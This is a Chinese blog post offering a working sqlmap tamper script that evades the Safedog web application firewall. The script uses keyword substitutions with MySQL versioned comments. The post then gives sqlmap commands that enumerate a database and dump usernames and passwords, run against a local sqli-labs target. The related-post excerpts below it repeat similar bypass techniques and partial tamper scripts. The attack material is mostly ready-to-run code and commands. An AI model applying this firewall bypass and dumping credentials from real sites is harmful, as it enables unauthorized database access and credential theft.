【Python脚本】SQLMap的Tamper脚本——绕过安全狗

于 2023-10-18 21:57:29 发布
阅读量810 收藏 2
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55205599/article/details/133915470
版权

一、安全狗的绕过方法

针对WAF编写Tamper脚本进行绕过

安装网站安全狗,此时再次尝试SQL注入时,安全狗会拦截

                                                        安全狗的绕过方法

被过滤的关键字 绕过方法
空格/*!*/
=/*!*/=/*!*/
AND/*!*/AND/*!*/
UNIONunion/*!88888cas*/
#/*!*/#
USER()USER/*!()*/
DATABASE()DATABASE/*!()*/
--/*!*/--
SELECT/*!88888cas*/select
FROM/*!99999c*//*!99999c*/from

二、把安全狗拦截的关键字进行替换

Bypass.py

from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.NORMAL

def dependencies():
	pass

def tamper(payload,**kwargs):
	if payload:
		payload = payload.replace("UNION","union/*!88888cas*/")
		payload = payload.replace("--", "/*!*/--")
		payload = payload.replace("SELECT", "/*!88888cas*/select")
		payload = payload.replace("FROM", "/*!99999c*//*!99999c*/from")
		payload = payload.replace("#", "/*!*/#")
		payload = payload.replace("USER()", "USER/*!()*/")
		payload = payload.replace("DATABASE()", "DATABASE/*!()*/")
		payload = payload.replace("AND", "/*!*/AND/*!*/")
		payload = payload.replace("=", "/*!*/=/*!*/")
		payload = payload.replace(" ", "/*!*/")
	return payload

三、脚本执行

3.1、SQL注入

sqlmap -u "http://127.0.0.1/sql/Less-4/?id=1" --tamper "Bypass.py" -v 3

3.2、遍历security库里的数据表

sqlmap -u "http://127.0.0.1/sql/Less-4/?id=1"  -v 3 --tamper "Bypass.py"  -D “security” --tables

3.3、遍历security库中users表的字段

sqlmap -u "http://127.0.0.1/sql/Less-4/?id=1"  -v 3 --tamper "Bypass.py"  -D “security” -T “users” --columns

3.4、遍历数据

sqlmap -u "http://127.0.0.1/sql/Less-4/?id=1"  -v 3 --tamper "Bypass.py"  -D “security” -T “users” -C “username,password” --dump

sqlmap tamper脚本编写
m0_56578216的博客
09-22 647
SQLMap 是一款SQL注入神器,可以通过tamper 对注入payload 进行编码和变形,以达到绕过某些限制的目的。但是有些时候,SQLMap 自带的Tamper 脚本并不是特别好用,需要根据实际情况定制Tamper 脚本sqlmap的编写语言也是pythontamper脚本能增强sqlmap的功能,达到绕过检测的目的。
sqlmap 双写关键字绕过 tamper
shadowwolf’s blog
08-30 2813
双写绕过的存在一般都是在某一些简单的waf中,将关键字select等只使用replace()函数置换为空,这时候可以使用双写关键字绕过 但是鉴于手注有些小麻烦,所以还是上sqlmap sqlmap中无双写注入的脚本,所以我编写了一个tamper,可以根据测出的被ban的关键词进行修改: #!/usr/bin/env python ''' sqlmap 双写绕过 by:shadowwolf ''' from lib.core.compat import xrange from lib.core.enums i
sqlmap绕过安全狗
qq_50854662的博客
01-05 6305
sqlmap绕过安全狗
sqlmap脚本安全狗
Hq_Dream的博客
01-05 4274
 脚本名:apostrophemask.py 作用:用utf8代替引号《Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'》 作用:当数据库为mysql绕过防火墙,每个关键字之前添加mysql版本评论 Example:   ("value' UNION ALL SELECT CONCAT(
【WAF剖析】——SQL注入之安全狗bypass深度剖析
Demo不是emo的博客
11-23 7151
sql注入不会绕过WAF?关注我,让我带你由简入难实战各个WAF,今天先来看看web安全渗透必会的安全狗WAF,你会绕吗?看我带你将它拿下
19.sqlmap饶过waf安全狗
最新发布
weixin_46525626的博客
07-13 956
因为大都是通过的方式进行拦截,所以如果出现了被拦截的情况,大概率是因为你的语句的触发了黑名单的验证机制,导致被拦截,那应该怎么检测呢?其实就行了,输入页面,如下说明“and 1”这个部分触发了拦截,此时的绕过方式可以选择替换或者绕过,这里我们先试试对中间的空格进行替换,空格的替换方式尤其多,我们不可能全部都能记住,所以这里就要FUZZ绕过方式一:IP白奖单从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP绕过的情况。
sqlmap tamper绕过安全狗
weixin_30294021的博客
07-08 1610
可以过5.3版本 放出py #!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.enums import PRIORI...
手把手教你编写SQLMapTamper脚本过狗
蚁景网安学院
02-22 711
https://xz.aliyun.com/t/11412sql注入bypass最新版某狗 (qq.com)奇安信攻防社区-记一次实战过狗注入 (butian.net)https://www.freebuf.com/sectool/179035.html本文仅用于技术讨论与学习测试环境最新版某狗测试方法安全狗其实是比较好绕的WAF,绕过方法很多,但这里我们就用一种:注释混淆一招鲜吃遍天注释混淆,其...
Sqlmap Tamper脚本详解:绕过WAF的技巧
"Sqlmap Tamper脚本是用于自动化SQL注入工具Sqlmap的一种扩展,它包含一系列脚本,目的是对原始payload进行修改以规避WAF(Web应用防火墙)的检测。Tamper脚本tamper函数、dependencies函数等组成,分别负责不同的...
SQLMap tamper脚本绕过WAF与渗透测试指南
"SQLMapTamper文档详细介绍了如何使用SQLMaptamper脚本绕过Web应用程序的敏感字符过滤和WAF规则,以便进行渗透测试。文档涵盖了tamper脚本的作用、用法以及针对不同数据库类型的tamper脚本选择。" 在网络安全...
最新棒SQLMAP 含过狗
07-06
当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。
网络安全渗透测试之绕过网站安全狗
09-05
网络安全渗透测试之绕过网站安全狗,通过简单明了的方法绕过安装有安全狗的Web网站服务器进行渗透攻击,仅供参考
ThinkPHPSQL0day:ThinkPHP3.0~3.3 betweenSQL注入的sqlmap Tamper
07-02
5. **sqlmap Tamper模块**:Tampersqlmap的一个关键组件,它提供了一系列预定义的脚本,用于修改请求中的SQL语句,以绕过网站的防御机制。比如,它可以改变参数的顺序、编码格式,或者使用不同的SQL语法来规避过滤...
SQL注入绕过安全狗
qq_45462249的博客
07-15 1410
网站安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具,WAF检测一般分为两种,一种白名单,一种黑名单。白名单相对于黑名单来说,更加安全,但是白名单由于设置的比较严格,有时会影响用户的正常访问,所以WAF还是用黑名单的比较多。后面接数据库版本号时,如果自身版本号大于等于字符数,就会将注释中的内容执行,否则就会当做注释来处理。查询这些分别注意union和select连接,from和表连接,还有database()括号的连接,需要用到以上方法结合起来。...
sqlmap tamper mysql_sqlmap tamper绕过安全狗
weixin_42361796的博客
01-19 145
可以过5.3版本 放出py#!/usr/bin/env python"""Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)See the file ‘doc/COPYING‘ for copying permission"""from lib.core.enums import PRIORITY__priority__ =...
sqlmap 注入字典_Fuzz绕过安全狗4.0实现SQL注入
weixin_42345731的博客
01-01 812
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入绕waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysq...
SQL注入-安全狗apache绕过
遇事不决冲冲冲
05-26 2652
环境配置 Windows 10 phpstudy sqli-labs靶场 安全狗apache4.0.30255
W3bsafe]SQLmap过狗命令的利用+教程
dfdhxb995397的博客
09-02 234
W3bsafe]SQLmap过狗命令的利用+教程 本文转自:i春秋社区 我就是那个爱装逼的小人 本屌又来装逼了SQLmap注入的时候 有的肯定会被安全狗拦截吧 本屌来教各位过狗!过waf等安全狗~~ sqlmap.py -u url -v 3 --batch --tamper "space2hash.py" --level 2 不要问我-v 3 -...
sqlmap过狗脚本练习1
weixin_43727482的博客
05-27 488
本地搭建sql注入网站练习 测试安全狗,输入不合法参数被安全狗拦截: 使用sqlmap: 检测到防护机制,失败; 先手工尝试绕过安全狗: 将空格替换为 “/*//\*//\*\/c*/” 成功绕过安全狗; 写个sqlmap脚本: #demo.py def tamper(payload,**kwargs): retVal = payload quote=False if payload: retVal = '' fo.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值